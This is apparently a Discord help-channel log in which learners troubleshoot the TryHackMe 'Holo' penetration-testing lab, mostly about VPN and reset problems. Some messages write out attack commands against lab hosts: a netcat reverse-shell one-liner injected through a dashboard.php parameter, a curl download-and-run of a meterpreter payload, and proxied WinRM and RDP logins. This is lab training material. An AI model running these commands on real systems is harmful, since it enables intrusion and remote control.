GG

holo colo

Hey all -- I just started working through this network on stream. For those interested, here's the first video where I work through the first 13 tasks. If anyone is stuck or would like to follow along, I hope you find this helpful. I'll be completing the full network so feel free to follow along on YouTube 🙂
https://youtu.be/4ue2Kc0cdlQ

ehh, holo is rated with a Difficulty: hard not medium

Well shoot, my google image skills need to up their game 😆

I'll fix that, thanks for the catch

Hey man! I was watching your videos on AD network and saw the interview with John Hammond. Great work! I will probably check this one out too

Hey!! Really appreciate the kind words!

Definitively some really great questions on that interview, it really helped in getting to know more of the mindset of interviewed, and not just the work/hacking-related type questions. You should bring more people on, cof 0day cof

I m getting this error using ntlmrelayx, any ideas?

in task 19 when you want to escape the docker container, even if you caught a shell or not, the IP of L-SRV01 changed from (10.200.114.33) to (192.168.100.1)!!!
which causes it to be unconnectable from outside. Any solutions?

Thats exactly the point. You have to learn pivoting

If I remember, the docker was public, but the docker host is in the internal network

in order for your machine to access the internal network (aka 192.168.100.1) you have to use a tool such as SShutle (https://github.com/sshuttle/sshuttle) which creates a kinda of VPN connection to the internal network

Or you can also use chisel and proxychains

dude its not a pivoting issue XD i cannot access the web server anymore! thats it

can i get a reset on .95

network please

the dashboard pageis refusing to load

i think the problem is on your side because i was doing the room the whole day and i was fine

can someone guide me please

i'm trying to learn some C2 and i have some questions regarding spawning an agent for the .31 host via the .33

what do i do

okay now im getting annoyed

Is the .114 network working correctly? I can't seem to reach port 80 on .114.31 even from the comprised Linux machine
Can someone reset 114?

is the .111 sub down? i cant ping .111.30

Can somebody explain me why I cant find subdomains with gobuster.

maybe gobuster is not designed to find subdomains

Its literally said that I can use gobuster or wfuzz 😅

maybe try wfuzz ¯_(ツ)_/¯

Should I configure DNS or something?

doubt so

not done any networks so no idea

If anybody know solution, I would appreciate it. I am unable to solve this for 2 hours 😦

Holo Network is up, so idk

Also tried wfuzz but same..

which sub are you on?

what do you mean by "sub"?

subnet

im having issues as well. i cant ping the DC or connect to websites

10.200.155.30 is Domain controller

ahhh

im .111

host file is correct too

is that kali linux?

yeh

because I dont have that file and I saw in walkthrough that some guy also changed that folder

/etc/hosts

And I didnt. So maybe thats the reason it doesnt work for me

I found that folder, should I insert IP of DC or IP of server L-SRV01?

DC1

idk what im doing but the .111 subnet is not responding to pings, nmap scans or wont show when i put it in hosrs

Oh

Nmap worked for me. I scanned L-SRV01 with this" range sudo nmap -sV -sC -p- -v 10.200.155.0/24"

but gobuster doesnt work for me

But after adding IP to /etc/hosts file I get other error

port 80 not open

should be open

it's the wordpress ip that ends in 33

scanned 4 times

port 80

nothing

waiting for a reset

Hey y'all. I'm trying to set up a general testing environment for windows security. I see a bunch of sources out there but can't tell if I can trust em. Can anyone recommend where I can grab a legit copy that isn't the eval version? Preferably server 2019 <

nvm, figured it out

This channel is for the holo network on tryhackme

I was doing the holo when I posted it. I was trynna create a similar environment and looking thru some options i had

Looks like the network is down again. waiting for a reset as well

Your question wasn't related though

Where am I supposed to post it then? General aint answering and you even refused to answer last time I recall

#infosec-general
You're not entitled to an answer though. Everyone here is a volunteer.

that I am aware since this is a discord community lmao but no one said nothing about entitlement tho. im just trynna figure things out just as much as everyone else is

No worries. Looks like you found your answer. 🙂

Does somebody know why gobuster cant find dev.holo.live subdomain. I am doing dir scan... And I am getting following error:

holo.live is fine, I can do vhost scan (obviously bcs I found dev domain) and I can visit webpage on web browser

Is dev.holo.live subdomain down?

do you have it added to hosts>

sry, but what do you mean?

oh, yes

10.200.155.33 holo.live,dev.holo.live,admin.holo.live

is my /etc/hosts file

how should I write it?

is it hard to write in discord chat?

I found solution, thanks!

Gave +1 Rep to @unreal hemlock

Why when I insert "http://dev.holo.live/img.php?file=/var/www/admin/supersecretdir/creds.txt" in browser, I am offered to download img.php file, instead of taking me to /creds.txt file

Hey

Does somebody know why suddenly admin login page on admin.holo.live is loading permanently after I inserted correct login credentials? It worked few minutes ago till I downloaded payload from python3 server that I am hosting, ran command via URL and got "10.200.155.XX - Command shell session 25 closed." on msfconsole

i have the same problem

Network has been reset. Ill try later if it works now. If you could write here if it works for you, I would apprrciate it

Now network works

let's hack it)

Yes. It works for me, too

I can't login successfully into admin.holo.live. Its loading it forever, again..

What about you?

i got shell

I came to part where I need to escape container (TASK 18). Suddenly webbrowser froze and I now can't login xd

Funny room

i'm in task 16

Can you access holo.live?

maybe you can try to restart your pc

Tried that

I am running Kali VM for hacking this room

But still..

Could you try access holo.live

yes

i have to all subdomain

dev.holo.live too

for me all works

I can access dev.holo.live too

But cant holo.live

And cant login in admin dashboard

i couldn't login in admin yesterday. But now all works. Maybe you can try to get access later?

Yes. Same was for me.. I went to sleep and it worked tomorrow. But Im frustrated with this network, constantly having bugs..

u can try to change your VPN

maybe it will help you

Didn't help

But thank you, anyway 🙂

You are welcome!

yo

Does you L-SRV01 have internal IP address. Because till my problem appeared, I had external IP address 10.50.155.33. Now its like this

i have the same ip addresses

like mine?

yep

192.168.100.1

wow

you changed /etc/hosts

to current ip adress?

Yea, but I realized it is wrong move. So I changed back to 10.200.155.33

Restarted NetworkManager and still doesnt work

why can't send the screenshort

you need to verify yourself

in my /etc/hosts i have the following IP address
10.200.95.33

can you try it?

Hello everyone!
If some body could help : in task 28, we have to give ```
What page does the reset redirect you to when successfully authenticated on S-SRV01?

I'm providing the name but it does not accept it..
any idea?

Okay, thats because there are more HOLO networks

My is 10.200.155.33

I mean, it was

Now its 192.168.100.1

But thats wrong one

my was 10.200.95.33

but now ip 192.168.100.1 and i didn't change my /etc/hosts and everything works

haha

Idk at all what is happening but nvm

Thanks anyway! 🙂

in task 28, they are asking about this page aren't they? (I blurred some part so no spoiling)

I have a problem in Task13 to generate reverse shell. I found the place to put the command but when I try in the browser with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.50.108.41 4444 >/tmp/f the nc doest not reach the target.

I also try to encode the url with burp suit

I have the problem in Task 20 with privilege escalation
when i use docker suid privilege escalation it output Unable to find image 'alpine:latest' locally or
the input device is not a TTY
if i don't stable shell.
What's the problem?

run nc -nlvp 4444 and then
http://admin.holo.live/dashboard.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.50.108.41%204444%20%3E%2Ftmp%2Ff

should help

I did it this way:

I made payload in msfvenom (linux/x64/meterpreter_reverse_tcp)
I uploaded it on python3 server.
I downloaded that payload from URL bar by typing: "admin.holo.live/dashboard?cmd=curl http://YOUR IP:PORT/payload -o /tmp"
Changed execution privilege with "dashboard.php?=chmod 755 /tmp/NameOfFile"
And executed it with /dashboard.php?cmd=/etc/NameOfFile"

@unreal hemlock if stabilize it says Unable to find image alpine:latest locally

@unreal hemlock i stabilize by python3 pty and export and then background it and run stty fg and so on

hi

instead of alpine:latest use the image available on the server.
use cocker image to list available images

thank

Gave +1 Rep to @unborn siren

web server are not working so much is it possible to reset ?

i tried again to privilege escalation but it didn't help

didn't help

oops

finally. bling bling

thank you

Gave +1 Rep to @unreal hemlock

anyone please?

I just tried ||reset.php|| and it worked, I was trying ||home.php||

Hello,

Did anyone succeeded with covenant (either powershell or HTTPGrunt)? I've been on it since yesterday with no luck (Idk if I should stick to the plan or switch to metasploit).

Thanks for your advise.

Right now I'm getting :

Illegal characters in path.
   at System.Security.Permissions.FileIOPermission.EmulateFileIOPermissionChecks(String fullPath)
   at System.Security.Permissions.FileIOPermission.QuickDemand(FileIOPermissionAccess access, String fullPath, Boolean checkForDuplicates, Boolean needFullPath)
   at System.Net.WebClient.GetUri(String path)
   at System.Net.WebClient.UploadString(String address, String data)
   at GruntStager.GruntStager.ExecuteStager()

with default tempates and the modified ones (when testing locally)

I see, I always had issues with Covenant ... but I gave it a chance this time again 🙂 thank you so much, will move on then!

Gave +1 Rep to @unreal hemlock

Hello!

For task 36, my understanding is that we will have the right to winRM for ||PC-FILESRV01|| using the account we found earlier ||watamet||.
In the text we read : If successfully authenticated, you should now have a working WinRM shell that you can use to execute remote commands.
it means that should work.

unfortunately I get a permission error, either using the account password or its hash.

$ proxychains -q -f proxychains-1081.conf evil-winrm -i 10.200.112.35 -u w****t -p '**********'
Evil-WinRM shell v3.3

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

I tried also winrs from S-SRV01 with the same permissions issue.

PS : I'm sure about password as I used it to RDP to S-SRV01

Anyone can help please?

Hello
I'm in Task 29. I want to catch traffic by BurpSuit. In browser i have access to S-SRV01 by foxyproxy. Foxyproxy use 1080 port and because of it i have access. So in BurpSuite i changed port to 1080 for catch traffic but it gives error that some program or process use this port. When i want use forxyproxy port 8080 that burpsuite can catch but if i use 8080 port i don't have access to site S-SRV01. How i can catch traffic by BurpSuite?

You can set an upstream proxy in burp

I did it and change foxyproxy to 8080 i can catch traffic but it loading infinity. What i did wrong?

Proxy host is wrong. Destination host is wrong. Proxy port is wrong.

Essentially every field except "enabled"

I used SOCKS proxy in Burp that's help me. But anyway thank you for help and feedback. Later i will figure out how works upsteam proxy in Burp.

Gave +1 Rep to @quiet raft

Holo seems to be stuck in a "loading" loop for me (loading tasks). I haven't joined the room yet. Anybody else having the same issue?

Network 10.200.107.0/24 is screwed up need help resetting it plz

Hey all, I'm currently doing the AMSI bypass. When I run amsitrigger against one of the ps scripts I get no results - is it because I'm running Commando VM?

Yeah, is amsitrigger just bumping the file up against windows defender to check for failures?

For some reason I thought it was doing something independently. I'll install a clean VM for it I suppose 😄

Is there an issue with server? It's showing as running but no boxes responding 😦

I'm in 10.200.112.x and it is running ok

10.200.114 for me and no response from anything.

I hope your reset count is near the requested 5 reqs; this morning I was the 5th to request it in my network

I am 1 of 4 haha. Task 43 too so nearly done with the box.

I'm stuck with the SMB relay... ( T47)

Hello everyone!

I finished the room and wanted to share some points, to have your feedback and eventually help others;

As far as I know :

• the WinRM PTH does not work, as user does not have the right to do it;
• the DLL hijacking does not work, as the scheduled task to run the script ||execute.ps1|| that simulates an admin running the vulnerable binary does not exist on the server;
• SMB relay did not work for me in the intended way, but I did it another way. May be I'm missing something;
• Covenant does not seam to work (?)

if anyone can correct me I'll be thankful (because this means I will learn something).

whenever i try to download my .ovpn file it downloads an empty file, anyone know how i can fix this?

Click regenerate, wait 2-3 minutes, download

still downloads an empty file

Did it start working for you at all? (And which subnet are you on?)

unfortunately it hasn't, but to be fair haven't tried as much cause i was learning for my exams 😅 , i believe i was on the 200.162 subnet

Ok, someone else was reporting something similar, if leaving and rejoining didn't help then not sure what needs doing. I'll update when i do know

Are you still in the network? and when you get a chance, can you confirm the subnet? 🙂

my bad, i based myself off my report, which was at the launch of this network xd , my bad the actual subnet is 200.69 🙂

ah brilliant, are you still in that network? If so, stay there please

Also, what's your THM username?

The web server is pretty instable it is not possible to get a reverse. Is there a backdoor to do the task 16 or after directly ?

Hey guys, quick question, how long is access granted to holo and if time expires can you start again. Thanks

7d and yes

Perfect thank you

Gave +1 Rep to @quiet raft

Apparently we can't see you in that network, so if you're still in it, try leaving and rejoining?

The host 10.200.111.30 is not attainable.

it happened to me too

the host is down

Hello,
Does the dll hijacking works for the others?

didn't work for me

yes it does

There's many instances of holo, you need to specify which one you're on.

That is not how holo works.
Staff can't reset it, and you need to be patient. Discord staff especially can't do anything.

Gang

skill issue

Discord staff aren't here to help you with networks.

Don't ping me for this

I can't.

can someone help me in this. I can't connect to the holo network

The Halo network openvpn file size is 0 bytes when downloaded and it won't connect. I contacted support a week ago but they still did not come up with the solution. They post an update every 2-3 days and asks one question and wait another 3 days to reply. Very disappointed with the customer service.

Same issue. The vpn file is 0 bytes and clicking on regenerate gives 404 error.

Leave the room and rejoin. That's what fixed the issue for me.

I can't escalate my privileges. The error is the input device is not a TTY.

I'm having a problem on scanning the first target L-SRV01

I can't connect to the port 80 web server

seems to be broken

did a double take there for a second

I have the same issue right now but with holo live

ãnybody having problems with vpn's thm on holo?

Sorry I’m only seeing this now. Is it resolved? If not you can try regenerating and if it occurs again please let me know

yeah. with these kind of rooms that need their own vpn files you will have to regularly delete your old file, regenerate the file and connect back

its the same with the wreath room

im having problems fuzzing the parameter for the admin room

i don't know why its not finding the parameter with FUZZ

ffuf -c -u http://admin.holo.live/dashboard.php\?FUZZ=ls+-
la -w holo_wl.txt

same error when i put :FUZZ at the end of the wordlist.

anyone?

you did a directory scan. so its going to look for directorys, not a dns servers such as dev or www. you need the dns switch

I could do the parameter fuzz with owasp zap but I can't get it to work with ffuf.

What do you mean by regular? Is there an instance where an configuration file is working one day then the next it is no longer working?

i mean because a lot of people are doing those rooms and eventually it does come down

so i would say yeah, about once or twice a weak the room gets kind of messed up and I have to delete my old vpn file and regenerate a new one

don't redownload the same one. refresh the site, regenerate the vpn and re download it

Are you referencing the network itself being messed up? You can just restart the network and it pushes it to a clean slate.

There is no reason you should have to regenerate your vpn file. All your doing is putting yourself in a new subnet you’re not actually changing anything

like right now the room seems messed up.

but i guess you're right about the vpn file for the holo network.

the reset is the best option but I have to wait a while to make my votes meet the requirement

Hello, I seem to be having the same 404 issue when trying to download the holo openvpn config. I have tried multiple servers, multiple browsers, and the leave, logout, clear cache, rejoin trick. Any other suggestions?

the same problem. :/

vote now if possible so we can reset. admin panel is not working

i voted for yall

It'd be great if a staff member could take a look at holo as it seems to be having issues. For the last 12 hours or so, I've been unable to reach DC-SRV01.

It seems the network has been reset at least once, i am for sure connected with the holo ovpn and my hosts file is updated.

@earnest hornet any way you can get someone to check this out?

Did you pivot to it?

nah it seems down right now

unable to connect but the pings go through

can't curl. says connection refrused

pivoted to admin yes but the initial target is unreachable. that is the core issue

yeah its saying unable to connect for me

i can't connect to the original 10.200.110.33

for sure. even if you use the ip right?.

yeah same

or any of thelm

for the past two days

and it just got reset

i dont' get it

if you guys please vote

for sure. i just started it. idk man.

lets get another reset going

hold on a sec dude

try to connect to 10.200.108.33

i can't ping it

its weird.

the pings work for the starting website of www.holo.live but i just can't connect to it

my holo network shows that i'm connected

so this ip for sure is not accessible. but i just tried .33 and it loaded.

the last reset did not work i guess

.33 is working for me even though it shows 10.200.108.30

mind if i dm?

sure

yeah its instantly going to unable to connect

its fried

anyone know what's happening to the network? Can't access anything even though I'm connected to the vpn

I'm probably really dumb - but I can NOT stabilize the shell in task 14 (which you need to complete task 17, I believe). Whenever I bring it back from being suspended, it goes into this weird terminal that you CAN'T get out of unless you click on the X in the top right of the window. What in the world am I doing wrong?

Are you doing the stty -raw and fg method?

And the syntax for the python command is wrong - it's supposed to read "python3"

Are you on recent kali AKA zsh?

yes, I'm doing those commands. yes, I'm on the most recent kali. I didn't realize it was zsh. so, I need to do the one-liner I assume?

You just need stty -raw; fg, I think that's the change at least

Either way, the stty and fg need to be in one command spaced with a semicolon

I'll give that a shot - thanks!

ugh - i think someone did something to the "dashboard.php" file, because it's just stuck now 😦

it's back 🙂

Hello, I'm at Task 4 and have no idea what to do. I am a newbie. Can i start with the holo network or should i do all the learning path first?

If you have no idea what you're doing, probably do some rooms and then Wreath.

Then Holo.

Is the Holo network having issues again? It's showing as "Resetting" for like half an hour now...

I was having issues with Holo yesterday - nmap couldn't detect any host on any IP or port. Couldn't ping anything either.

Hi,
Why is the network always has issue? Starting the network after stopped state I'am not able to reach the targets and it always happens.
If the solution is resting pls hit the reset button, thank you.

Hi,

i have issues as well "Network state: Resetting" since yesterday

it is showing "Network state: Resetting" for weeks now. I can't start or stop anything (reset button doesn't work either), but the hosts are reachable.

Mysql server is broken. Can someone reset the network pls

Or can people vote for it to be reset and stuff Pls 😎

Just so you know, you can vote to reset once per hour, so you can reset it on your own, it might just take a bit 🙂

yea I just dont really want to wait 3 hours 🤣 cus I wanted to finish this today. Looks like I might have to though

Ye, just saying, because only the few people that share the exact same holo network with you would be able to help you with resetting

I wonder how many others are on it with me rn 🤔 I'm guessing theres a limit of like 4/5 people or something

Ye, some little number like that

They are many instances, please specify what instance you're on to avoid unnecessary resets.

Its at 4/5 now and I only have to wait like 20 mins don't worry about it mate 👍

Ok after a reset it is still not working

I must be doing something wrong here

This is the correct command, right?

Sorry some context

I'm on task 17

trying to connect to the remote mysql server

so I can then go on to escape the docker container (task 18)

I think its a problem with the mysql specifically

I'm on 111 btw

That's unrelated to what instance you're on

o rly

my bad

I mean the server not my client or whatever

I was being an idiot. Doing something wrong.

apologies to anyone

Hi, I'm unable to login to the administrator domain with the given creds
Plus the network state is just stuck at resetting with 4/5 resets

Can't do anything

I am having the same issue since at least 2 days now:

• Subnet 95: 10.200.95.0/24
• Network State: Resetting
• Network up time: -
• Start, Extend and Reset Buttons are greyed and cannot be used.

Any way to reset the network? I mean properly reset it...

I am unable to download the hololive vpn configuration file.

I am a subscriber

have you tried leaving and rejoining the room hitting the regenerate vpn file button waiting 5 mins then clicking download???

I already tried regenrating configuration file but no benifits.

I already completed holo before but just wanna brush up few things.

the leave and rejoin of the room will not change your progress but might still help you get a working vpn file

Sir/Mam i solved that complete env last year. I just wanna do it again. There is no rejoin.

Keep getting this.

https://tryhackme.com/jr/hololive

how long usually it takes to reset ?

dont care the status and continue

oh thank you

wait wut?? 😂

I found the credentials but I cannot login to the admin dashboard of holo.live... it keeps showing me the login page... Is there any problem with it?

then after leave use the following link: https://tryhackme.com/jr/hololive
then regenerate the config and then try downloading it again

Holo room isn't working

ive regenerated my ovpn file yet i can't still access it

@lone spruce

I can't access holo

its been 1hr now

since i've been trying to access it

@ionic tinsel

Its been about 2hrs now i can't still access holo network

I encountered the same problem.

i Found credential but cannot login

Holo room work ?

I was trying right now to complete this network - but me too I'm stuck at login - credentials do not work . I am on 10.200.110 in case there are multiple instances of the network

im vote reset

cant download holo vpn

get a 404 error

Ded network😄

Can anyone let me know holo network can stil work ?

its partially working but idk

Is Holo still down?

Is Holo down? Network seems up for more than 10 minutes but L-SRV01 is not responding.

Holo is stuck at Network state: Resetting. Buttons to Start/Extend/Reset are greyed out. Can someone check (or reset) please?

Is HOLO still down?

holo?

up and down and up and down... 🙂

?

hey guys can anyone help ? I'm doing the nmap but somehow i manage to get only the .250 host and not the .33

nmap -sV -sC -p- 10.200.112.0/24

:/

is there any mod up ?

i can't see the host .33 up

only the .250

Currently there are a few problems with HOLO. Just try again. I had the same problem yesterday when scanning the internal network with crackmapexec.
Since the reset I can no longer bring chisel on target .33 (no more space available - => / is using 99.8% of 7.69GB). 😦 I'll check back tomorrow.

just scanned the network. Got .33 and .250.

thanks. I'll try again tomorrow then.

Gave +1 Rep to @molten nova

Anyone have an idea how i could create some disk space here? └─$ ssh linux-admin@10.200.112.33 130 ⨯
linux-admin@10.200.112.33's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1030-aws x86_64)

System information as of Thu Dec 15 08:08:43 UTC 2022

System load: 0.01 Processes: 100
Usage of /: 99.8% of 7.69GB Users logged in: 0
Memory usage: 4% IPv4 address for eth0: 10.200.112.33
Swap usage: 0%

=> / is using 99.8% of 7.69GB If I want to upload chisel, but "No space left on device" 😦

So...yesterday using the nmap I only had the .250 host. Today I get the .33 too but the port 80 is not showing...what the fuck is wrong with this room lol

how am I supposed to train in this condition

After the reset I see again only .250
Just little annoying, but maybe that's what you're supposed to be taught in this room. Patience and persistence. 😅

@sage pine ?

hey is .33 up?

I gave up

Hi,
When I run:
gobuster vhost -u http://holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 30
It doesn't find the three domains.
Any idea what I am doing wrong?

is your /etc/hosts set up correctly? I also used wfuzz
wfuzz -u holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.holo.live" --hh 21456

hi not sure why i got all hosts down when i did nmap on holo

anoything wrong w the system?

I'm having trouble with the 10.200.108.xx can a mod reset please

You VPN'd to holo?

No

I don't access. I pressed the "Reset" button, but only 1/5

can someone help me with vote for reset?

I am using the Kali machine from your web and I don't have access

For what it's worth, I used the file subdomains-top1million-5000.txt

I got the 3 subs very quickly and checking the file, they are all in the top 25 lines within that file. Things got ugly soon after though, and I got a bunch of timeouts.

You might save time using a smaller file.

Made good progress. Was nearly broken out of the container when the network stopped working just before I could do the final curl command.

Now I can't ping anything and I guess have to start over.

I guess I'm vote 4 of 5 for a reset.

There is something I'm not I understand. Should I go over the tasks and hack or I supposed to go blind hack all the network and sometime to pick on the walkthrough?

The network was up and now it again down 😦

Does someone is looking over it ?

Ok I was able to reset it, let's see

still down

yes i did

hi it's still the same

this is now on attack machine but it shows the same result too

5 hours ago when I started it was up and after 40-50 minutes it went down again

was up and down again

hi

trying to escape the container with any possible way im getting the error "the input device is not a TTY"

is that my reverse shell messed up?

and when trying to sudo, resulting in

sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper

You will only get ping returns from 7 IP addresses, one of which is the gateway. That's a lot of scanning up front with your command, would suggest a ping scan first, and then a more thorough portscan when you've found hosts that respond

that screenshot is accurate, in that the majority of the subnet is in fact unresponsive because there is nothing there

For this room, the privesc method is an SUID binary. Sudo wouldn't work anyway as you do not know www-data's password.

Did you stabilize the shell?

python3 -c 'import pty; pty.spawn("/bin/bash")'
then ctl-z
then
stty raw -echo; fg
then < enter >
then
export TERM=xterm

or maybe just the export

Try searching for SUID vulnerabilities

find / -type f -perm -4000 2>/dev/null

You will find a binary that can be abused (SUID), Go to gtfobins.github.io to find the method. It needs to be modified slightly

Thanks for the advice, eventually it was a different docker run command I found on stackoverflow that got my the root access, I probably messed up the first pivot shell

Anyone having issues with the Kali machine to use Burp? I don't have the HTTP History window, it's say it empty

why I can't upload images ?

hihi, i tried to do a ping scan this way

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sp 10.200.110.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-28 03:45 EST
Could not parse as a prefix nor find as a vendor substring the given --spoof-mac argument: 10.200.110.0/24. If you are giving hex digits, there must be an even number of them.
QUITTING!

but got the above.

then when i tried to add www.holo.live to /etc/hosts

like that below

but i cldn't get to the webpage

can someone help me

HOW u succeed to upload images? I don't have the button from the left to upload

-sp is not correct for what you're trying to do.
Nmap flags are case sensitive.

does anyone managed to downlaod sshuttle into the S-SRV01?

im getting unable to access git hub

and pat install also ends up with error

apt*

also i cant sudo as root 😦

S-SRV01 is a windows box - there is no ~~spoon ~~sudo.

maybe im confusing

its an ubuntu 20.04

L-SRV01 is the only Linux box on that network. You have to break out of the docker container and then crack the passwords. One of the accounts has wide-open sudo access to let you continue further

already did i have the pass and user also mayde sshkey persistence

but cant manage to brake free, as i want to use sshuttle

as for 'apt install', I would recommend you obtain the sshuttle binary on your Kali box, host it, and transfer it to L-Srv01 that way.

ill try that

thanks

many people stuck here too

what is task 15 want me to do

i'm very confuse

i passed now

how to fix if room bug ???

The room is not bugged - this is a new concept that requires some patience and experimentation to become familiar with exactly was is going on . It's not a typical CTF (even though there are flags), rather you are encountering 'layers' to a network. And the web services running on L-SRV01 are the first layer.

sorry for misunderstanding you, i have exec terminal and it not finished then the dashboard.php not responding so i can't connect to admin.holo.live/dashbaord.php to connect my terminal again

I tried serveral times so I guess I need to reset instance

do you get any output from "admin.holo.live/dashboard.php?cmd=id"

no

I just connected to the HoloLive network via VPN. Logged in to admin.holo.live using admin:DBxxxxxn! password, then browsed to admin.holo.live/dashboard.php?cmd=id, and received the output I was expecting.

it should have 1 instance right why i can't normal login

XD

i will extends network and try again

i just about cached in browser

bruh

for those of you how have troubles (like i had) with receiving incoming connection from NTLMrelayX(Task 47) use the version v0.9.22(i first tried with v0.10.1 without success) and BEFORE setting the port forward in Meterpreter make sure that you have set in proxychains config version 4 of SOCKS protocol(i had 5 set and it didn't received any communication)... be careful with these versions otherwise will not work. very nice room! thank you @lone spruce and thank you @daring fulcrum

Gave +1 Rep to @lone spruce

Is anyone's vpn connection to the network being weird

trying to get a shell from PC-FILESRV01 cant figure this out

got a webshell on S-SRV01

tried every shell i know and can connect, the wierd this is i can ping my machine from SRV01 and cannot ping from my machine to S-SRV01

smb client / winrm/ xfree rdp/ nothing can reach the filesrv

Is this the step that requires DLL Injection and messing with a scheduled task? If so, I completely bypassed that and got privesc using the PrintNightmare exploit path. The scheduled task was not running. I ran PowerView.ps1 and got the PrintNightmare route that way

Thanks for the answer, and that what i intended to do, probelm was im having problem with the proxy which i cannot reach all the machines in the network...

i used chisel. Set up the socks5 connection. With xfreerdp you can supply the /proxy command line parameter: xfreerdp /log-level:OFF /w:1600 /h:1024 /v:10.200.110.35:3389 /proxy:socks5://localhost:1080 /d:hololive /u:wa—et /p:Noth—rry!

creds don't seem to work for admin.holo.live on the 10.200.95.x subnet. Anybody else have this issue?

Make sure you set up the proxy chain and chisel/port forwarding correctly

First off the other machine is windows therefore it’s shouldn’t work I think

Gave +1 Rep to @zenith talon

Yea I’m guessing it’s a problem with the room, I really tried every possible way 😦

Maybe chisel AND port forwarding as a tunnel between them?

is anyone experiencing connectivity issues in the 10.200.114 network?

on the filesrv, as i understand, there should be a user defined scheduled task?

Same as a lot of people, i cant download the vpn file. 404 error.

leave/rejoin room?

yes i tried that and it didnt work

an answer from the room-bugs channel :
"leave the room.... rejoin it.... go to download the vpn file... hit regen button... wait 5 min.... try download it... maybe tada"

i was doing that a couple of times, logging out, trying different room links, it eventualy downloaded it

hi. I'm attempting authenticate to pc-filesrv01 host but 445 port is not open.

and reset button is disabled on this network. I can't continue to tasks.

You have to pivot to it by using a socks proxy. Read through the previous material

I done it with metasploit and chisel. Running nmap return other port but not 445. I also run nmap on l-srv01 host. But got same result.

Which task/step?

task 37

for some reason ||dashboard.php|| is not loading, is anyone with this problem?

Port 80 is down for me

strange, tried to reset but It needs 5 votes

I reset it about 3 hours ago and ran a Nmap scan again and port 80 is down for some reason

My port 80 is fine, just the ||dashboard.php|| that is not loading, I don't know If I can ask for a staff to take a look

very strange

when I try to download the vpn config file it says it's lost in the matrix? SOLVED

Any reason whenever I run ffuf or gobuster against ||holo.live|| I get errors? I added it to /etc/hosts already. I can load it up on firefox going to the domain and dirbuster it but whenever I run a nslookup it gives my the IP address to the public version of ||holo.live|| Im not sure how to troubleshoot this.

Same thing is happening with me when I am running gobuster. I even tried resetting and running gobuster with less threads, still the same. Not sure why

Hi, how did you solved it? i'm having the same issue

I left the room and joined again! also kept fiddling about with the regenerate button for the download (:

I had the same issue, i'm not entirely sure what was going on, but it started working when I put the IP address in instead of website url

but it was being a nightmare after that too

Thanks for the info @worn burrow

Gave +1 Rep to @worn burrow

np man, how far into the network are you now?

Thanks @worn burrow

Gave +1 Rep to @worn burrow

do you have any issues with the websites not resolving correctly?

i cant reach holo network?can someone help?

have you tried downloading a new vpn file?

yep, now i can reach but there are alot of vhosts

try replace the URL with the target IP (:

can i dm?

of course

can some one help on holo network?

How long does it take to reset the lab? 😦

Unable to run initial scan 😭

I think you need to login first 🙂

404 When trying to download the Holo Network VPN?

Can you head over to the room https://tryhackme.com/room/hololive

Press "options" -> "leave room"

After that, click here -> https://tryhackme.com/jr/hololive

Once you have rejoined the network, make sure to regenerate your new configuration file by heading to https://tryhackme.com/access, selecting the network from the dropdown, and finally clicking "regenerate"

I've never used a THM lab environment before. After 9 days, access is cutoff regardless of completion?

Hm, Can't connect to the Network with the VPN, It kept giving me Restart pause
Left and rejoined and regenerated the vpn multiple times

Still same problem

Update: VPN is working Now the problem is related to OPENVPN version. If you are using Latest version of Parrot OS and facing this problem, add the --data-ciphers AES-256-CBC to the holovpn file either at the beginning or ending

can anyone reset or vote for reset the 109 subnet

Do you mean a vote reset for the room?

If so, just did

Yeah i mean some mods can reset the room right

But thank you

maybe @pale plover or @earnest hornet

I cant ping the machine, im in the middle of docker breakout and network time ranout, i restarted the machine since then i cant access it

Mods aren’t employees, only community staff :)

there is 13 mins left

Jabba knows everything about computers, now that he replied, it should work after 15 minutes

Sorry, my bad

Not a problem, common misconception

I don’t have permission to manage the networks, but I’ll see what I can do

Jabba, who are the members that check and work on room bugs? Is it only the room creator for 'x' room?

And specific tryhackme staff

Like Ninja? 🤓

No, mods are not THM employees

its my 1st time am accessing Holo and its showing 9 days access left so i can't access holo after 9 days?

No that is not what it means... It means after 9 days you are automatically removed from the room to save resources... You can join it again right after... And the answered questions are never reset

ok thanks for info i was worried cuz i got function in few days

Gave +1 Rep to @iron galleon

Task 35 AV Evasion Wrapping the burrito
can anyone help me
No matter which method i use i cant get the revershell

I tried to ping my attack machine from target box its pinging ✔️
I used the script in the task ❌
I used Nishang with simple php backdoor ❌
so far no luck

I even tried to get the revers shell on L-SRV01 from S-SRV01 that didnt work as well

Well, I wasted my whole day on this so, I disabled AV and enabled it after i got the shell

oh come on guys fix the issues with holo and wreath please

Hey! Looking for some advice with domain resolution

I added holo.live to my /etc/hosts and the associated ip, however in my browser whenever I attempt to access it, it send me to www.holo.live instead

Unfortunately have to agree with the majority of people in this chat, holo is not the best

I have a random connection to L-SVR01 that sometimes resolves, most of the time doesn't

why does http://www.holo.live keep resolving to the interent-based site?

I added it to my /etc/hosts

keep getting that

It only resolves when using the ip, can confirm

Holo seems to be better now

Also was my fault, was using a comma to seperate hostnames lol

servers still sluggish/time out though

The dashboard broke, F

Hi all, In task 10

In a black box pentest, how find the hidden parameter example= on x.php. i.e x.php?example=

This is already explained in the room with wfuzz

Got iit ,Thank you😅🙂

hi, for task 47, i'm not receivng a connection from dc to ntlmrelayx, i started it before i created the meterpreter tunnel, also im using the 0.9.22 version of ntlmrelyx, any ideas please?

Is there anything to observe at task 9? I am scanning for several hours now with gobuster, but don’t get any hits.

Hey guys, can I approach this room from a pure black box pentest perspective?

